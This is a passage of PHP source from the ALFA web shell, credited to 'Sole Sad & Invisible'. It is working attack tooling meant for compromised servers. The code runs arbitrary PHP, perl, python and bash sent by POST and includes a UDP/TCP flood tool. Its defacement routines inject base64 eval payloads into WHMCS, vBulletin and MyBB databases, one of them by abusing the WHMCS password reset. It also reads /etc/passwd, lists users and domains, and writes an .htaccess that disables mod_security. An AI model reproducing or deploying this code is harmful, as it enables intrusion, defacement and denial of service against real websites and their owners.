3184$alfa1_escape = addslashes($_POST["alfa1"]);
3185}
3186if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
3187echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";updateFileEditor("'.$alfa1_escape.'", "'.$alfa3_escape.'");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
3188}
3189echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
3190break;
3191case 'touch':
3192@chdir($_POST['c']);
3193if( !empty($_POST['alfa3']) ) {
3194$time = strtotime($_POST['alfa3']);
3195if($time){
3196$touched = false;
3197if($chdir_fals&&$alfa_canruncmd){
3198 alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
3199 $touched = true;
3200}
3201if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
3202echo 'Fail!';
3203else
3204echo 'Touched!';
3205} else echo 'Bad time format!';
3206}
3207clearstatcache();
3208echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
3209break;
3210case 'image':
3211@chdir($_POST['c']);
3212echo('<hr>');
3213$file = $_POST['alfa1'];
3214$image_info = @getimagesize($file);
3215if(is_array($image_info)||$chdir_fals){
3216$width = (int)$image_info[0];
3217$height = (int)$image_info[1];
3218if($chdir_fals&&$alfa_canruncmd){
3219 $source = alfaEx("cat '".addslashes($file)."' | base64");
3220 list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
3221 $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
3222 $image_info['mime'] = $mime[1];
3223}else{
3224 $source = __ZW5jb2Rlcg(__read_file($file, false));
3225}
3226$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
3227if($width > 800){$width = 800;}
3228echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
3229}
3230break;
3231}
3232echo '</div>';
3233alfaFooter();
3234}
3235function findicon($file,$type){
3236$s = 'http://solevisible.com/icons/';
3237$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
3238if($type!='file'){
3239return ($file=='..'?$s.'back.png':$s.'folder.png');
3240}else{
3241$ext = explode('.',$file);
3242$ext = end($ext);
3243$ext = strtolower($ext);
3244return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
3245}
3246}
3247function alfadlfile(){
3248if(isset($_POST['c'],$_POST['file'])){
3249$basename = rawurldecode(basename($_POST['file']));
3250$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
3251$alfa_canruncmd = _alfa_can_runCommand(true,true);
3252if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
3253ob_start("ob_gzhandler", 4096);
3254header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
3255header("Content-Type: application/octet-stream");
3256if($GLOBALS["glob_chdir_false"]){
3257 $randname = $basename.rand(111,9999);
3258 $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
3259 $filepath = $scriptpath."/".$randname;
3260 if(_alfa_is_writable($scriptpath)){
3261 alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
3262 readfile($filepath);
3263 @unlink($filepath);
3264 }else{
3265 alfaEx("cat '".addslashes($_POST["file"])."'");
3266 }
3267}else{
3268 readfile($_POST['file']);
3269}
3270}else echo('Error...!');}}
3271function __alfa_set_cookie($key, $value){
3272 $_COOKIE[$key] = $value;
3273 @setcookie($key, $value, time()+(86400 * 7), '/');
3274}
3275function alfaphpeval(){
3276if(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){
3277 $tempdir = $_COOKIE["eval_tmpdir"];
3278}else{
3279 $tempdir = dirname(alfaEx("mktemp"));
3280 __alfa_set_cookie("eval_tmpdir", $tempdir);
3281}
3282alfahead();
3283if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
3284echo '<div class=header>';
3285ob_start();
3286$INI=ini_get_all();
3287print '<table border=0><tr>'
3288.'<td class="listing"><font class="highlight_txt">Param</td>'
3289.'<td class="listing"><font class="highlight_txt">Global value</td>'
3290.'<td class="listing"><font class="highlight_txt">Local Value</td>'
3291.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
3292foreach ($INI as $param => $values)
3293print "\n".'<tr>'
3294.'<td class="listing"><b>'.$param.'</td>'
3295.'<td class="listing">'.$values['global_value'].' </td>'
3296.'<td class="listing">'.$values['local_value'].' </td>'
3297.'<td class="listing">'.$values['access'].' </td></tr>';
3298$tmp = ob_get_clean();
3299$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3300$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3301echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3302}
3303if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
3304echo '<div class=header><style>.p {color:#000;}</style>';
3305ob_start();
3306phpinfo();
3307$tmp = ob_get_clean();
3308$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
3309$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
3310echo str_replace('<h1','<h2', $tmp) .'</div><br>';
3311}
3312if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
3313echo '<div class=header>';
3314ob_start();
3315$EXT=get_loaded_extensions();
3316echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
3317echo '</div><br>';
3318}
3319$lang_html = "";
3320foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
3321echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\'phpeval\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select>'._alfa_load_ace_options("eval").'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):"<?php\n\n\techo('hello alfa !');\n\n?>").'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>';
3322echo '</form><pre id="PhpOutput" style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class="ml1">';
3323if(!empty($_POST['alfa1'])){
3324if($_POST['alfa3']=="php"){
3325ob_start();
3326eval('?>'.$_POST['alfa1']);
3327$result = htmlspecialchars(ob_get_clean());
3328}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
3329 $lang = $_POST['alfa3'];
3330 $filename = "temp".rand(11111,99999);
3331 $temp = $tempdir."/".$filename ;
3332 __write_file($filename, $_POST['alfa1']);
3333 $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
3334 @unlink($filename);
3335 @unlink($temp);
3336}
3337echo '<textarea class="bigarea">'.$result.'</textarea>';
3338}
3339echo '</pre></div>';
3340alfafooter();
3341}
3342function alfahash(){
3343if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
3344if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
3345$stringTools = array(
3346'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
3347'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
3348'strrev ( $string )' => 'strrev($s)',
3349'bin2hex ( $string )' => 'bin2hex($s)',
3350'hex2bin ( $string )' => 'hex2bin($s)',
3351'md5 ( $string )' => 'md5($s)',
3352'sha1 ( $string )' => 'sha1($s)',
3353'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
3354'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
3355'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
3356'crypt ( $string )' => 'crypt($s)',
3357'crc32 ( $string )' => 'crc32($s)',
3358'str_rot13 ( $string )' => 'str_rot13($s)',
3359'urlencode ( $string )' => 'urlencode($s)',
3360'urldecode ( $string )' => 'urldecode($s)',
3361'full_urlencode ( $string )' => 'full_urlencode($s)',
3362'htmlspecialchars ( $string )' => 'htmlspecialchars($s)',
3363'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
3364'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
3365'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
3366'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
3367'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
3368'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
3369);
3370alfahead();
3371echo '<div class=header>';
3372echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
3373foreach($stringTools as $k => $v)
3374echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
3375echo "</select> <input type='submit' value=' '/><br><textarea name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
3376if(!empty($_POST['alfa1'])){
3377$string = addslashes($_POST['alfa2']);
3378$string = str_replace('\"','"',$string);
3379$alg = $_POST['alfa1'];
3380$code = str_replace('$s',"'".$string."'",$alg);
3381ob_start();
3382eval('echo '.$code.';');
3383$res = ob_get_contents();
3384ob_end_clean();
3385if(in_array($alg, $stringTools))echo '<textarea class="bigarea">'.htmlspecialchars($res).'</textarea>';
3386}
3387echo "</div>";
3388alfaFooter();
3389}
3390function alfados(){
3391alfahead();
3392echo '<div class=header>';
3393echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
3394if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
3395echo __pre();
3396$packets=0;
3397ignore_user_abort(true);
3398$exec_time=(int)$_POST['alfa2'];
3399$time=time();
3400$max_time=$exec_time+$time;
3401$host=$_POST['alfa1'];
3402$port=(int)$_POST['alfa3'];
3403$method=$_POST['alfa4'];
3404$out = str_repeat('X',65000);
3405while(1){
3406$packets++;
3407if(time() > $max_time){
3408break;
3409}
3410$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
3411if($fp){
3412fwrite($fp, $out);
3413fclose($fp);
3414}
3415}
3416echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
3417echo "</pre>";
3418}
3419echo '</div>';
3420alfafooter();
3421}
3422function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
3423function alfaIndexChanger(){
3424alfahead();
3425
3426echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
3427if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
3428echo __pre();
3429
3430echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
3431<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
3432";
3433$table = array('td1' =>
3434 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3435 'td2' =>
3436 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
3437 'td3' =>
3438 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
3439 'td4' =>
3440 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3441 'td5' =>
3442 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3443 'td6' =>
3444 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3445);
3446create_table($table);
3447echo "<br><div class='txtfont'>| Your Index |</div><br>
3448<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3449<input type='submit' value=' '>
3450</form></center></center>";
3451if(isset($_POST['alfa6'])){
3452$s0levisible="Powered By Solevisible";
3453$dbu = $_POST['alfa6'];
3454$path = $_POST['alfa5'];
3455$fname = $_POST['alfa4'];
3456$dbn = $_POST['alfa7'];
3457$dbp = $_POST['alfa8'];
3458$dbh = $_POST['alfa9'];
3459$index = $_POST['alfa10'];
3460$index = str_replace("\'","'",$index);
3461$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
3462$saveData = __ZW5jb2Rlcg($deface);
3463$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
3464if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3465$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3466$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
3467$soleGet = mysqli_fetch_assoc($soleSave);
3468$tempSave1 = $soleGet['message'];
3469$tempSave = str_replace("'","\'",$tempSave1);
3470$inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
3471$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
3472$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
3473$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
3474if(function_exists('curl_version')){
3475$AlfaSole = new AlfaCURL(true);
3476$saveurl = $AlfaSole->Send($path."/pwreset.php");
3477$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
3478$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
3479$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
3480$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
3481__alert('File Created...');
3482echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
3483}else{
3484echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
3485}}}}
3486if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
3487echo __pre();
3488
3489echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
3490<p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
3491";
3492$table = array('td1' =>
3493 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3494 'td2' =>
3495 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3496 'td3' =>
3497 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3498 'td4' =>
3499 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
3500 'td5' =>
3501 array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
3502);
3503create_table($table);
3504echo "<br><div class='txtfont'>| Your Index |</div><br>
3505<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
3506<input type='submit' value=' '></form></center></center>";
3507if($_POST['alfa8']=='>>'){
3508$s0levisible="Powered By Solevisible";
3509$dbu = $_POST['alfa2'];
3510$dbn = $_POST['alfa3'];
3511$dbp = $_POST['alfa4'];
3512$dbh = $_POST['alfa5'];
3513$index = $_POST['alfa6'];
3514$prefix = $_POST['alfa7'];
3515$index=str_replace("\'","'",$index);
3516$set_index = "{\${eval(base64_decode(\'";
3517$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
3518$set_index .= "\'))}}{\${exit()}}";
3519if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
3520$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
3521$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
3522$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
3523$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
3524@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
3525@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
3526@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
3527__alert('VB index changed...!');
3528}
3529}
3530}
3531if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
3532echo __pre();
3533
3534echo "<center><center><div class='txtfont_header'>| Mybb |</div>
3535<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
3536";
3537$table = array('td1' =>
3538 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
3539 'td2' =>
3540 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
3541 'td3' =>
3542 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
3543 'td4' =>
3544 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
3545);
3546create_table($table);
3547echo "<br><div class='txtfont'>| Your Index |</div><br>
3548<textarea name=mybbindex rows='19' cols='103'>
3549<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
3550if(isset($_POST['alfa6'])){
3551$mybb_dbh = $_POST['alfa6'];
3552$mybb_dbu = $_POST['alfa7'];
3553$mybb_dbn = $_POST['alfa8'];
3554$mybb_dbp = $_POST['alfa9'];
3555$mybb_index = $_POST['alfa10'];
3556if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
3557$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
3558$prefix="mybb_";
3559$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
3560$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
3561__alert('MyBB index changed...!');
3562}
3563}
3564}
3565echo "</div>";
3566alfafooter();
3567}
3568function alfaproc()
3569{
3570alfahead();
3571echo "<Div class=header><br><center>";
3572if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
3573$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
3574if($GLOBALS['sys']=="win"){
3575$process=array(
3576"Task List" =>"tasklist /V",
3577"System Info" =>"systeminfo",
3578"Active Connections" => "netstat -an",
3579"Running Services" => "net start",
3580"User Accounts" => "net user",
3581"Show Computers" => "net view",
3582"ARP Table" => "arp -a",
3583"IP Configuration" => "ipconfig /all"
3584);}else{
3585$process=array(
3586"Process status" => "ps aux",
3587"Syslog" =>"cat /etc/syslog.conf",
3588"Resolv" => "cat /etc/resolv.conf",
3589"Hosts" =>"cat /etc/hosts",
3590"Cpuinfo"=>"cat /proc/cpuinfo",
3591"Version"=>"cat /proc/version",
3592"Sbin"=>"ls -al /usr/sbin",
3593"Interrupts"=>"cat /proc/interrupts",
3594"lsattr"=>"lsattr -va",
3595"Uptime"=>"uptime",
3596"Fstab" =>"cat /etc/fstab"
3597);}
3598foreach($process as $n => $link){
3599echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
3600}
3601echo "</center><br>";
3602if(!empty($_POST['alfa1'])){
3603echo "<pre class='ml1' style='margin-top:5px' >";
3604if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
3605echo alfaEx($cmd.$_POST['alfa1'], true);
3606echo '</pre>';
3607}
3608echo "</div>";
3609alfafooter();
3610}
3611function alfasafe(){
3612alfahead();
3613echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
3614echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
3615if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
3616if(!_alfa_file_exists("/etc/virtual/domainowners")){
3617echo __pre();
3618$solevisible9 = _alfa_file('/etc/named.conf');
3619if(is_array($solevisible9)){
3620foreach($solevisible9 as $solevisible13){
3621if(@eregi('zone',$solevisible13)){
3622preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
3623if(strlen(trim($solevisible14[1][0])) > 2){
3624echo $solevisible14[1][0].'<br>';
3625}}}
3626}
3627}else{
3628echo __pre();
3629$users = _alfa_file("/etc/virtual/domainowners");
3630if(is_array($users)){
3631foreach($users as $boz){
3632$dom = explode(":",$boz);
3633echo $dom[0]."\n";}}}}
3634if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
3635echo '
3636<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
3637if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
3638if(!_alfa_file_exists("/etc/virtual/domainowners")){
3639$site = trim($_POST['alfa7']);
3640$rep = str_replace(array("https://","http://","www."),"",$site);
3641$user = "";
3642if(function_exists("posix_getpwuid") && function_exists("fileowner")){
3643 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
3644 $user = $user['name'];
3645 }
3646}else{
3647 if(_alfa_can_runCommand(true,true)){
3648 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
3649 }
3650}
3651if(!empty($user)&&$user!='root'){
3652echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
3653}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
3654}else{
3655$site = trim($_POST['alfa7']);
3656$rep = str_replace(array("https://","http://","www."),"",$site);
3657$users = _alfa_file("/etc/virtual/domainowners");
3658foreach($users as $boz){
3659$ex = explode(":",$boz);
3660if($ex[0] == $rep){
3661echo __pre()."<center><table border='1'>
3662<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
3663<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
3664if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
3665if(!_alfa_file_exists("/etc/virtual/domainowners")){
3666echo __pre();
3667$i = 0;
3668while ($i < 60000) {
3669$line = @posix_getpwuid($i);
3670if (!empty($line)) {
3671while (list ($key, $vl) = each($line)){
3672echo $vl."\n";
3673break;}}$i++;}
3674}else{echo __pre();
3675$users = _alfa_file("/etc/virtual/domainowners");
3676foreach($users as $boz){
3677$user = explode(":",$boz);
3678echo trim($user[1]).'<br>';}}}
3679if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
3680echo __pre();
3681if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
3682for($uid=0;$uid<60000;$uid++){
3683$ara = @posix_getpwuid($uid);
3684if(!empty($ara)){
3685while(list ($key, $val) = each($ara)){
3686echo "$val:";
3687}echo "\n";}}
3688}else{__alert('failed...');}}
3689if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
3690@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
3691echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
3692}
3693if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
